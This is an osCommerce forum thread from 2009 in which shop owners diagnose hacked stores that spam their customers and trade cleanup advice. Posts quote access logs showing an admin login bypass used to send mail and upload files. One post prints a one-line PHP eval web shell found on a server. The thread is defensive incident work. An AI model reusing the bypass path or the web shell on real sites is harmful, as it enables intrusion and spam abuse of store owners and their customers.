Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Spam Emails Being Sent


talbot649

Recommended Posts

  • Replies 62
  • Created
  • Last Reply

You need to have one of your customers send you one of the emails, complete with COMPLETE header information. Analyze it. It is easy to put someone else' email address in the From: field on the envelope. You need to be certain that the emails are originating from your server. If they are, stop your email transport program, set options to send email to false, wipe your customer db, rename your admin folder.... do whatever you have to do to stop the emails. Then let's figure out how you were hacked. And a lot more information is going to be needed for anyone to assist.

 

Analyze your logs. Look in the access logs for access to files that don't appear to be a part of OSC. Look in ftp logs for someone uploading files other than yourself.

 

Start by looking in all your folders for files that don't belong. Php files will stand out in an image folder and that is a prime target for hackers to put things.

Then start looking in files for code that doesn't belong, especially in those php files that are designed to send email.

 

In all likelihood you will find files on your system that just don't belong there.

 

Install Site Monitor. Secure your admin folder. Rename your admin folder. You have a long job ahead of you and before you ever begin locate and protect your last known backup of your site files. You may have to wipe and restore.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Link to comment
Share on other sites

You need to have one of your customers send you one of the emails, complete with COMPLETE header information. Analyze it. It is easy to put someone else' email address in the From: field on the envelope. You need to be certain that the emails are originating from your server. If they are, stop your email transport program, set options to send email to false, wipe your customer db, rename your admin folder.... do whatever you have to do to stop the emails. Then let's figure out how you were hacked. And a lot more information is going to be needed for anyone to assist.

 

Analyze your logs. Look in the access logs for access to files that don't appear to be a part of OSC. Look in ftp logs for someone uploading files other than yourself.

 

Start by looking in all your folders for files that don't belong. Php files will stand out in an image folder and that is a prime target for hackers to put things.

Then start looking in files for code that doesn't belong, especially in those php files that are designed to send email.

 

In all likelihood you will find files on your system that just don't belong there.

 

Install Site Monitor. Secure your admin folder. Rename your admin folder. You have a long job ahead of you and before you ever begin locate and protect your last known backup of your site files. You may have to wipe and restore.

 

He's not the only one.. they got me last night too... I'll start looking.

 

FTP logs show no access for over a month. and site logs show only google bots from what i can tell. still looking

Link to comment
Share on other sites

I have THE SAME PROBLEM. Just discovered it today. |Spam sent from the (legitimate) address sales [at] hogueprophecy.com

I have located the culprit files. Some are php files, others I don't know what they are ending in .dgo.

They are located in the oscommerce images folder. The ones in my images folder are named:

mix.dgo

xso.dgo

s99.php.orig ===== this one particularly nasty has total 0 permissions so I have to ask my server to delete it, can't do it myself.

wso.php.orig

 

and

 

.flex.php

.load.php

captcha_.php

mm.php

 

Question: I am running osCommerce Online Merchant v2.2 RC1. Do the bug fixes in the latest version of oscommerce fix security issues?? If I install the latest version, will I also need to do something further for fixing this security leak. Is this a brand new one, or is this addressed in the later versions?

thanks,

JSC, Boulder

Jamie/Boulder

Link to comment
Share on other sites

found it...

 

Host: 74.220.219.147

/admin/mail.php/login.php?action=send_email_to_user

Http Code: 302 Date: Dec 18 01:27:02 Http Version: HTTP/1.1 Size in Bytes: -

Referer: -

Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;)

 

/admin/mail.php?mail_sent_to=TEXT_ALL_CUSTOMERS&osCAdminID=7a4b2e9e9e92d13685d711e9df1c8187

Http Code: 302 Date: Dec 18 01:27:02 Http Version: HTTP/1.1 Size in Bytes: -

Referer: -

Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;)

 

/admin/login.php

Http Code: 200 Date: Dec 18 01:27:02 Http Version: HTTP/1.1 Size in Bytes: 3331

Referer: -

Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;)

 

Ideas?

Link to comment
Share on other sites

See the 'Serious Hole in Oscommerce' thread. Then read the 'How to secure your site' thread and fix your sites. Otherwise you'll end up with worse than spammed customer lists.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

See the 'Serious Hole in Oscommerce' thread. Then read the 'How to secure your site' thread and fix your sites. Otherwise you'll end up with worse than spammed customer lists.

 

Just checked - emails definitely coming from the site and it looks like this happening to a lot of people. I will work through the fixes and see if I can lock them out. I've got about 10 sites to manage too... :(

hor-i-zon

Link to comment
Share on other sites

Just checked - emails definitely coming from the site and it looks like this happening to a lot of people. I will work through the fixes and see if I can lock them out. I've got about 10 sites to manage too... :(

 

Where is the direct link to serious hole in security - because this just happened to me this morning too.. apparently there is someone out there exploiting this..

 

Also - Jami1955 where did you find these files I want to make sure I do not have them on mysite as well.

Link to comment
Share on other sites

Where is the direct link to serious hole in security - because this just happened to me this morning too.. apparently there is someone out there exploiting this..

 

Also - Jami1955 where did you find these files I want to make sure I do not have them on mysite as well.

Seems that when I had my site redone by a local designer he left the 2 files that the secure his thread had mentioned NOT to leave on the site.. I have removed those and made changes per that thread.. we will see how it goes if we have any further issues.

Link to comment
Share on other sites

Hi

 

I have the same problem today. The spammer sent out an email using [email protected] (which is not a valid email address) and included a link for a motor insurance company from Argentina!

 

I am looking through the site for "illegal" files and found an index.php in /images/yahoo/. I have now deleted the file.

 

Am still looking.

 

My ISP 50Webs.com is rubbish. They say "there is no way to see who has log in the database. No such logs are kept thus server will have serious problem storing so much data considering this is a shared web hosting platform."

 

Any other pointers would be greatly appreciated.

 

Thank you very much!

 

Kind regards,

 

Pei

Link to comment
Share on other sites

Hi

 

I have the same problem today. The spammer sent out an email using [email protected] (which is not a valid email address) and included a link for a motor insurance company from Argentina!

 

I am looking through the site for "illegal" files and found an index.php in /images/yahoo/. I have now deleted the file.

 

Am still looking.

 

My ISP 50Webs.com is rubbish. They say "there is no way to see who has log in the database. No such logs are kept thus server will have serious problem storing so much data considering this is a shared web hosting platform."

 

Any other pointers would be greatly appreciated.

 

Thank you very much!

 

Kind regards,

 

Pei

The presence of the index.php file in a yahoo directory inside the images folder means that you have been hacked more seriously than simply an exploit on your customer list. The hacker has been able to place files in your site and by extension, will have been able to edit them too. You need to clean up your whole site. Cleaning up your site to eliminate every piece of code the hacker has placed that could let him back in won't be easy, although the Site Monitor addon would help. But quickest and easiest might be to delete the whole store including the database and restore from a known clean backup, and then immediately apply all necessary security measures as listed in this thread: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site. Of course if you use Site Monitor (link in that thread) to attempt to manually clean up the site you will still need to implement all the other security measures listed too.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

Hi there,

 

Somehow, my customer database are being sent spam emails from the osCommerce store.

 

They are receiving it from [email protected] with links to pharmaceuticals. Can anyone help me clean it up?!

 

Many thanks for looking :)

 

 

Hi

 

I have enountered this aswell on two sites i am involved in. By a coincident I found a file in the root of the installation that I didn't recognize. Don't know how it got there, but it might be some kind of XSS? (cross site scripting). On both sites the patterns are the same. It starts with a message sent using the contact form. The message have an invalid message header and the message body looks like junk.

 

The junk is sent:

xxx.xxx.xxx.xxx - - [08/Dec/2009:20:43:36 +0100] "POST /contact_us.php?action=send HTTP/1.1" 302 5

xxx.xxx.xxx.xxx - - [08/Dec/2009:20:43:38 +0100] "GET /contact_us.php?action=success HTTP/1.1" 200 14398

 

A file, fly.php is uploaded into the store root directory (the IP address in the upload process is the same on both sites and is done almost the same time):

66.96.128.60 - - [10/Dec/2009:03:05:34 +0100] "GET /fly.php HTTP/1.1" 404 37 "-" "-"

66.96.128.60 - - [10/Dec/2009:03:05:35 +0100] "POST /admin/file_manager.php/login.php?a=1&action=save HTTP/1.1" 302 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

 

The spam is sent from one of the sites and it is sent from different IP addresses all the times:

xxx.xxx.xxx.xxx - - [19/Dec/2009:12:44:05 +0100] "POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 5 "-" "-"

xxx.xxx.xx.x - - [19/Dec/2009:16:21:18 +0100] "POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 5 "-" "-"

 

The fly.php is very small and is only one row. I have not yet found out what it can be used for:

test<?php @eval($_POST

);?>

 

I do not know how to avoid this, and there might already be some solution to avoid this. So in the meantime I have changed the file name of admin/file_manager.php, and also changes name of fly.php. Eventually I will receive more http requests for fly.php and it will be logged (just wish I knew how to use it to nail the bastard).

 

Br & merry xmas 2 all except the hacker

Link to comment
Share on other sites

Merry xmas to you too. Sorry to say that there will be more hacked files than the one you identified and you will need to take much more extensive measures to get rid of the hack and lock the hacker out. Find and implement all the security measures identified in the 'How to secure your site' thread. The hacker is using vulnerabilities that have been known about for quite a while now. The best way, if you can, is to delete the whole site then restore from a known clean back up and implement the measures. If you can't do this you will have to use the Site Monitor addon to identify all affected files and deal with them by either deleting them or removing the malicious code, and then implement all the needed measures.

 

The code in fly.php can allow the hacker to run any script they want on your server, by the way, if the eval function is enabled. Basically you don't control it, although you may think you do, they do.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

Dear all,

 

my problem seems to be the one described by talbot649

 

Email headers indicate, that Spam was sent using my server. (diagnosed as described by mdtaylorlrim)

 

Server logs indicate a couple of the access attempts as described by persichini (which are POST /admin/mail.php/login.php?action=send_email_to_user) - even by that exact same IP address 74.220.219.147) This IP resolves to Bluehost Inc. by the way, and has made only 6 access attempt to my site, which coincide (+/- a couple of minutes) with the time points emails were sent / received. As described, the attacker seems to identify themselves as a googlebot.

As for the file names mentioned by jami1955, I did not find ANY of those. Furthermore, a comparison with a 2 months old Backup (via diff -r) showed no other changes than the ones performed by myself.

 

Neither did I find the file described by hkdude (containing <?php @eval($_POST

);?>)

 

No "illegal" files came to my attention when manually checking - as after all, the backup might be infected already...? Note that my attention has as many loopholes als OSC itself.

 

I followed Ben Nevis's advice/link and edited admin/includes/application_top.php and includes/application_top.php following the instructions posted by FWR Media in the "serious hole" post

 

Also, I took some more security advices given by FWR media. Still, Ben Nevis'

"Otherwise you'll end up with worse than spammed customer lists." worries me.

 

Now, my 2 quesrtions:

 

1. How can I test if I am really safe now?

2. I do not understand the hack. What could the attacker do or have done? Did the attacker have potentiall access to my whole database (in which other systems place their stuff as well) or could they even have the DB-password?

 

Thank you very much for your help and I hope you can answer my two final questions. To all others affected and most of all the attacker: I have gipsy friends.

Link to comment
Share on other sites

Dear all,

 

my problem seems to be the one described by talbot649

 

Email headers indicate, that Spam was sent using my server. (diagnosed as described by mdtaylorlrim)

 

Server logs indicate a couple of the access attempts as described by persichini (which are POST /admin/mail.php/login.php?action=send_email_to_user) - even by that exact same IP address 74.220.219.147) This IP resolves to Bluehost Inc. by the way, and has made only 6 access attempt to my site, which coincide (+/- a couple of minutes) with the time points emails were sent / received. As described, the attacker seems to identify themselves as a googlebot.

As for the file names mentioned by jami1955, I did not find ANY of those. Furthermore, a comparison with a 2 months old Backup (via diff -r) showed no other changes than the ones performed by myself.

 

Neither did I find the file described by hkdude (containing <?php @eval($_POST

);?>)

 

No "illegal" files came to my attention when manually checking - as after all, the backup might be infected already...? Note that my attention has as many loopholes als OSC itself.

 

I followed Ben Nevis's advice/link and edited admin/includes/application_top.php and includes/application_top.php following the instructions posted by FWR Media in the "serious hole" post

 

Also, I took some more security advices given by FWR media. Still, Ben Nevis'

"Otherwise you'll end up with worse than spammed customer lists." worries me.

 

Now, my 2 quesrtions:

 

1. How can I test if I am really safe now?

2. I do not understand the hack. What could the attacker do or have done? Did the attacker have potentiall access to my whole database (in which other systems place their stuff as well) or could they even have the DB-password?

 

Thank you very much for your help and I hope you can answer my two final questions. To all others affected and most of all the attacker: I have gipsy friends.

Quite possibily the attack was limited to sending spam to your customer list. No access to your 'whole' database is needed for that. It's not a sophisticated attack, it is a very simple one that can simply be avoided by changing your admin directory name, protecting it with .htaccess, and using FWR's mod to application_top. FWR's mod alone would do it, but these are not the only security measures you need to take because there are other known vulnerabilities as well. Even if you avoided being a victim of them this time round, you are running a very high risk that you will be a victim sooner or later if you do not apply all the measures listed in the 'How to secure your site' thread.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

Hello, everyone.

 

I also have the same problem. I have checked with my hosting and they said they can restore a previous backup of my site. But I wanna slowly figure out what makes this "spam" e-mail sending robot tick.

 

So basically I have done what was on the How to secure your site page, the serious hole found in osCommerce, security issue with admin directory, and I mean everything. Yes, I have banned the whole of Turkey as the .htaccess protection document stated.

 

Still, the question remains: How do I know that my site is safe now? Are the methods of "Securing your web site" enough to stop the already there "hack" of sending spam e-mails to customers?

 

I will continue to monitor my site and pay close attention to logs.

Link to comment
Share on other sites

Are the methods of "Securing your web site" enough to stop the already there "hack" of sending spam e-mails to customers?

 

 

 

Yes, but so long as you have properly cleaned your site, hackers often leave backdoors.

 

To test your site generally there a number of programs that will scan your site for issues, a PCI scan is also basically doing that.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

Hi there,

 

Somehow, my customer database are being sent spam emails from the osCommerce store.

 

They are receiving it from [email protected] with links to pharmaceuticals. Can anyone help me clean it up?!

 

Many thanks for looking :)

 

 

I have several ocCommerce sites and they all have been hacked too with the spam emails being sent to my customers. Some of the email addresses are fakes, but some are from ligate email addresses that I have.

 

I have found .php files in the catalog/images folder along with the "yahoo" and "thumbs" folder in the catalog/images folder as well - which has me very worried. I also found "gd.php" and "feedback.php" files I didn't create in one store, the "fly.php" file in another store and one called "m.php" in a third store. I deleted these files right away.

 

I also logged into my datatbase in the phpMyAdmin. When I login here I not only see my store's database, but another database as well that I did NOT create.

 

After deleting these .php files in the images folder and logging into my database and changing the password I now can no longer access the online store on the customer or admin side. I don't know if this is related to the hacking issue or the new password (I'm a novice). Here's the error that I get when I try to access the store:

Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'my_db_user_name'@'not_revealed_ip_adress' (using password: YES) in /path_to_my_osc_shop/catalog/includes/functions/database.php on line 20

Unable to connect to database server!

 

I checked my permissions on everything and they are good, but I do have the filemanager.php file that I saw in the "secure your site" thread that was mentioned should be deleted.

 

Can anyone help me? I need someone to hold my hand through this because I'm not a code writer.

 

~ Liz

Link to comment
Share on other sites

A reply directed to talbot649:

 

In your admin set "Allow guest to tell a friend" to false

 

Save it.

 

Someone has naively set that to true which allows any wandering spambot to send spam to everyone and their brother....

:o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Liz, if you change the DB password you have to also change the configure.php files (catalog and admin) to reflect the change where it says:

 

  define('DB_SERVER_PASSWORD', '');

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

A reply directed to talbot649:

 

In your admin set "Allow guest to tell a friend" to false

 

Save it.

 

Someone has naively set that to true which allows any wandering spambot to send spam to everyone and their brother....

:o

 

 

Germ, thanks for this update. This is very helpful. I haven't been posting anything on this subject, but definitely feeling the pain that the rest of the oscommerce folks are experiencing. its such a pain in the a*s. And the perception to our site owner customer as well as the customers who are in the database is that there info is compromised. But anyhow, this one entry seemed to make alot of sense. I've removed all the fly.php and other php files, day before christmas, which didn't stop the emails. one little step at a time. Maybe this one item you've mentioned will put the icing on the bomb that stops these creeps in their tracks. THANKS AGAIN!

Link to comment
Share on other sites

Yes, but so long as you have properly cleaned your site, hackers often leave backdoors.

 

To test your site generally there a number of programs that will scan your site for issues, a PCI scan is also basically doing that.

 

Can you give me some external links of PCI scanning tools? I tried searching but I'm afraid all those "free" scans will instead hack my account.

Link to comment
Share on other sites

Ok I was basically at the Latest Visitors monitor of cPanel, and I this came in:

 

 

Host: 173-9-234-93-illinois.hfc.comcastbusiness.net


   *  


/store/admin/mail.php/login.php?action=send_email_to_user
Http Code: 404 	Date: Dec 27 01:58:40 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: -
Agent: -

 

Does the line "Http Code: 404" mean that the attempt to send mail was not successful? I haven't received any spam mails yet.

 

If it is, how can I prevent the above from executing the same thing again?

 

I have installed everything regarding security and stuff. (see previous posts).

Link to comment
Share on other sites

 

Does the line "Http Code: 404" mean that the attempt to send mail was not successful? I haven't received any spam mails yet.

 

If it is, how can I prevent the above from executing the same thing again?

 

I have installed everything regarding security and stuff. (see previous posts).

It was an attempt. It didn't work - the 404 error means the page wasn't found. It couldn't be found if you did all the recommended security stuff. You can't really prevent attempts, but you could set up IPTrap to block IP addresses of anyone looking for a directory named 'admin'.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...